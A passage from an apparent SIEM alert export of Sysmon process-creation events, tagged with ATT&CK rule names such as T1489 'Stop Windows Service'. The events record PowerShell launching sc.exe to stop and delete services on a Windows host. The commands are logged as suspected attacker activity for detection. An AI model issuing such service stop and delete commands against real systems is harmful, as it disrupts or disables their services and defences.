2020 @ 14:19:00.990",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.344 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010a97e2100} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.346595600Z"",""eventRecordID"":""2782"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.344\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010a97e2100}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.344"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010a97e2100}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.901",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.279 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010107c2100} +ProcessId: 3668 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.284573100Z"",""eventRecordID"":""2779"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.279\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010107c2100}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.279"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010107c2100}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.858",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:50:30.252 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010667a2100} +ProcessId: 7592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.255525100Z"",""eventRecordID"":""2777"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.252\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010667a2100}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.252"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010667a2100}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.848",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.236 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-001087792100} +ProcessId: 2084 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.239538300Z"",""eventRecordID"":""2776"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.236\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-001087792100}\r\nProcessId: 2084\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.236"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-001087792100}"",""processId"":""2084"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.801",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.202 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010fb762100} +ProcessId: 7136 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.204192300Z"",""eventRecordID"":""2773"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.202\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010fb762100}\r\nProcessId: 7136\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:30.202"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010fb762100}"",""processId"":""7136"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.697",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.163 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00106d742100} +ProcessId: 4128 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.165569000Z"",""eventRecordID"":""2770"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.163\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00106d742100}\r\nProcessId: 4128\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.163"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00106d742100}"",""processId"":""4128"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.675",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.151 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-001097732100} +ProcessId: 2872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config 
